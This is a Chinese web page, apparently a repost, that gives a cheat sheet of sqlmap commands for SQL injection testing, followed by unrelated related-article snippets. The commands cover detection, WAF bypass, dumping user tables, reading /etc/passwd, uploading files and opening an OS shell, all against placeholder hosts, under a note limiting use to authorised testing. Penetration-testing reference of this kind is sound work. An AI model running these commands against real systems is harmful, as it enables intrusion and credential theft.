sqlmap基础命令总结

​注意事项:仅用于授权测试,避免非法使用。

目录

​一、基础命令

​二、数据库信息获取

​三、绕过 WAF/IDS

​四、文件系统与系统命令

​五、高级功能与优化

​六、实战示例


一、基础命令
  1. 检测注入点

    sqlmap -u "http://target.com/index.php?id=1" --batch  # 自动检测注入点[2,4](@ref)
    • --batch:自动选择默认选项,无需交互。
    • --cookie="PHPSESSID=xxx":处理 Cookie 注入。
  2. 指定请求类型

    sqlmap -u "http://target.com/login.php" --data="username=admin&password=123"  # POST 请求注入[2,5](@ref)
    • --method=POST:强制指定请求方式。
    • --random-agent:随机 User-Agent 绕过检测。
  3. 代理与伪装

    sqlmap -u "http://target.com" --proxy="http://127.0.0.1:8080"  # 使用代理隐藏 IP[3,5](@ref)
    • --referer="http://baidu.com":伪造 Referer 头

二、数据库信息获取
  1. 枚举数据库

    sqlmap -u "http://target.com" --dbs  # 列出所有数据库[2,4](@ref)
    sqlmap -u "http://target.com" --current-db  # 获取当前数据库名[2,4](@ref)
  2. 表与字段操作

    sqlmap -u "http://target.com" -D database_name --tables  # 列出指定数据库的表[2,4](@ref)
    sqlmap -u "http://target.com" -D database_name -T users --columns  # 查看表结构[2,4](@ref)
  3. 数据提取

    sqlmap -u "http://target.com" -D database_name -T users -C username,password --dump  # 导出指定字段数据[2,4](@ref)

三、绕过 WAF/IDS
  1. TAMPER 脚本绕过

    sqlmap -u "http://target.com" --tamper="space2comment,base64encode"  # 变形 SQL 语句[1,3,5](@ref)
    • 常用脚本:space2comment(空格转注释)、apostrophemask(引号编码)。
  2. 其他绕过参数

    sqlmap -u "http://target.com" --level=3 --risk=3  # 提高测试深度与风险等级[4,5](@ref)

四、文件系统与系统命令
  1. 文件读写

    sqlmap -u "http://target.com" --file-read="/etc/passwd"  # 读取服务器文件(需高权限)[3,4](@ref)
    sqlmap -u "http://target.com" --file-write="local.txt" --file-dest="/remote/path"  # 上传文件[4,5](@ref)
  2. 获取系统权限

    sqlmap -u "http://target.com" --os-shell  # 尝试获取系统 Shell(需 FILE 权限)[2,4](@ref)
    sqlmap -u "http://target.com" --os-cmd "whoami"  # 执行系统命令[2,4](@ref)

五、高级功能与优化
  1. 性能优化

    sqlmap -u "http://target.com" --threads=5 --delay=2  # 设置线程数及延迟[3,5](@ref)
    sqlmap -u "http://target.com" -o  # 开启默认性能优化[1,3](@ref)
  2. 自定义检测与输出

    sqlmap -u "http://target.com" -v 6  # 显示完整 HTTP 响应内容[5](@ref)
    sqlmap -r request.txt  # 从文件加载 HTTP 请求[3,4](@ref)

六、实战示例

目标:从注入到获取数据

  1. 检测注入点
    sqlmap -u "http://target.com?id=1" --batch
  2. 提取数据库名
    sqlmap -u "http://target.com?id=1" --dbs
  3. 导出管理员密码
    sqlmap -u "http://target.com?id=1" -D target_db -T users --dump

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/73822.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Unity光线传播体积(LPV)技术实现详解

一、LPV技术概述 光线传播体积(Light Propagation Volumes)是一种实时全局光照技术,通过将场景中的间接光信息存储在3D网格中,实现动态物体的间接光照效果。 核心优势: 实时性能:相比传统光照贴图,支持动态场景 硬件…

SpringBoot (一) 自动配置原理

目录 一 自动配置 1:数据源的手动配置 1:SpringBoot的自动配置 二 自动配置的完整流程:(底层) 1. 场景化依赖与Starter机制 2. 主程序入口与注解驱动 3. 自动配置类的加载与筛选 4. 自动配置类的实现逻辑 5. 自动配置的触发与执行流…

OJ题:移动零

双指针法 c 语言实现 void moveZeroes(int* nums, int numsSize) {int dest,cur; //创建临时指针和目标指针destcur0;//出初始化while(cur<numsSize)//遍历{if(nums[cur]!0){swap(&nums[cur],&nums[dest]);cur;dest;}else{cur;}}} 思路是建立两个指针&#xff0…

pycharm终端操作远程服务器

pycharm项目已经连接了远程服务器&#xff0c;但是打开终端&#xff0c;却依旧显示的是本地的那个环境&#xff0c;也就是说没有操作远程的那个环境。只能再使用Xshell去操作远程环境&#xff0c;很麻烦&#xff0c;找了下教程。 来源&#xff1a;https://blog.csdn.net/maolim…

(头歌作业—python)3.2 个人所得税计算器(project)

第1关&#xff1a;个人所得税计算器 任务描述 本关任务&#xff1a;编写一个个人所得税计算器的小程序。 相关知识 个人所得税缴纳标准 2018 年 10 月 1 日以前&#xff0c;个税免征额为 3500 元/月&#xff0c;调整后&#xff0c;个税免征额为 5000 元/月&#xff0c; 7 级超…

Redis场景问题1:缓存穿透

Redis 缓存穿透是指在缓存系统&#xff08;如 Redis&#xff09;中&#xff0c;当客户端请求的数据既不在缓存中&#xff0c;也不在数据库中时&#xff0c;每次请求都会直接穿透缓存访问数据库&#xff0c;从而给数据库带来巨大压力&#xff0c;甚至可能导致数据库崩溃。下面为…

CUDA Memory Fence 函数的功能与硬件实现细节

CUDA Memory Fence 函数的功能与硬件实现细节 Memory Fence 的基本功能 CUDA中的memory fence函数用于控制内存操作的可见性顺序&#xff0c;确保在fence之前的内存操作对特定范围内的线程可见。主要功能包括&#xff1a; 排序内存操作&#xff1a;确保fence之前的内存操作在…

实战篇Redis

黑马程序员的Redis的笔记&#xff08;后面补一下图片&#xff09; 【黑马程序员Redis入门到实战教程&#xff0c;深度透析redis底层原理redis分布式锁企业解决方案黑马点评实战项目】https://www.bilibili.com/video/BV1cr4y1671t?p72&vd_source001f1c33a895eb5ed820b9a4…

Reactive编程:什么是Reactive编程?Reactive编程思想

文章目录 **1. Reactive编程概述****1.1 什么是Reactive编程&#xff1f;****1.1.1 Reactive编程的定义****1.1.2 Reactive编程的历史****1.1.3 Reactive编程的应用场景****1.1.4 Reactive编程的优势** **1.2 Reactive编程的核心思想****1.2.1 响应式&#xff08;Reactive&…

异步转同步,实现一个消息队列

有一个场景&#xff0c;需要实现一个消息队列&#xff0c;要求 1&#xff0c;3&#xff0c;4 秒后&#xff0c;依次打印 1&#xff0c;2&#xff0c;3&#xff0c;如下&#xff1a; 其实考察的是怎么用同步的方式实现异步。 本文总结了四种方式实现&#xff1a;常规嵌套、prom…

【Spring Boot 与 Spring Cloud 深度 Mape 之十】体系整合、部署运维与进阶展望

【Spring Boot 与 Spring Cloud 深度 Mape 之十】体系整合、部署运维与进阶展望 #微服务实战 #Docker #Kubernetes #SpringSecurity #OAuth2 #分布式事务 #Seata #ServiceMesh #总结 #SpringCloud #SpringBoot 系列终章&#xff1a;经过前九篇 [【深度 Mape 系列】] 的系统学习…

求职笔试题

PDD 最长公共子序列 1143-最长公共子序列 class Solution:def longestCommonSubsequence(self, text1: str, text2: str) -> int:"""二维动态规划"""m, n len(text1), len(text2)# dp [[0]* (n1)] * (m1) 这种写法错误&#xff0c;m1行…

【MySQL基础-16】MySQL DELETE语句:深入理解与应用实践

1. DELETE语句基础&#xff1a;数据删除的艺术 在数据库管理中&#xff0c;DELETE语句是维护数据完整性和清理过期信息的关键工具。与日常生活中的"删除"不同&#xff0c;数据库中的删除操作需要更加谨慎和精确&#xff0c;因为数据一旦删除&#xff0c;恢复可能非常…

python学习笔记(3)——元组

Python3 元组全面详解 一、元组的定义与特性 基本概念 元组(Tuple)是Python中的不可变序列,用小括号()表示,元素用逗号分隔。与列表不同,元组一旦创建,元素不能修改、添加或删除(元素本身为可变对象的情况除外)。 不可变性 • 元组的每个元素的引用不可变,但若元素是可…

Android 中实现一个自定义的 AES 算法

版权归作者所有&#xff0c;如有转发&#xff0c;请注明文章出处&#xff1a;https://cyrus-studio.github.io/blog/ 前言 AES&#xff08;Advanced Encryption Standard&#xff0c;高级加密标准&#xff09; 是一种 对称加密算法&#xff0c;用于加密和解密数据。AES 由 美国…

小河:团队金牌精准计划

【趋势识别与预测】 数据趋势分析在随机序列研究中首要价值在于识别潜在规律并提升预测能力。随机序列常表现为无规则波动&#xff0c;但通过滑动平均、指数平滑、小波变换等方法&#xff0c;可剥离噪声干扰&#xff0c;提取长期趋势或周期性成分。例如&#xff0c;在金融时间序…

S32K144外设实验(七):FTM输出多路互补带死区PWM

文章目录 1. 概述1.1 时钟系统1.2 实验目的2. 代码的配置2.1 时钟配置2.2 FTM模块配置2.3 输出引脚配置2.4 API函数调用1. 概述 互补对的PWM输出是很重要的外设功能,尤其应用再无刷电机的控制。 1.1 时钟系统 笔者再墨迹一遍时钟的设置,因为很重要。 FTM的CPU接口时钟为SY…

数据结构与算法:算法分析

遇到的问题&#xff0c;都有解决方案&#xff0c;希望我的博客能为您提供一点帮助。 本篇参考《Data Structures and Algorithm Analysis in C》 “在程序设计中&#xff0c;不仅要写出能工作的程序&#xff0c;更要关注程序在大数据集上的运行时间。” 本章讨论要点&#xf…

Redis数据持久化机制 + Go语言读写Redis各种类型值

Redis&#xff08;Remote Dictionary Server&#xff09;作为高性能的键值存储系统&#xff0c;凭借其丰富的数据类型和原子性操作&#xff0c;成为现代分布式系统中不可或缺的组件。 1、Redis支持的数据类型 Redis支持的数据类型可归纳为以下9类&#xff1a; String&#x…

排序--归并排序

一&#xff0c;引言 归并排序作为七大排序中一种&#xff0c;本文将讲解其排序原理和代码实现。 二&#xff0c;逻辑讲解 来看一组动图&#xff1a; 首先先进行大逻辑的讲解&#xff0c;在一个乱序的数组中如图&#xff1a; 通过递归进行一次次分组如图&#xff1a; 分组逻…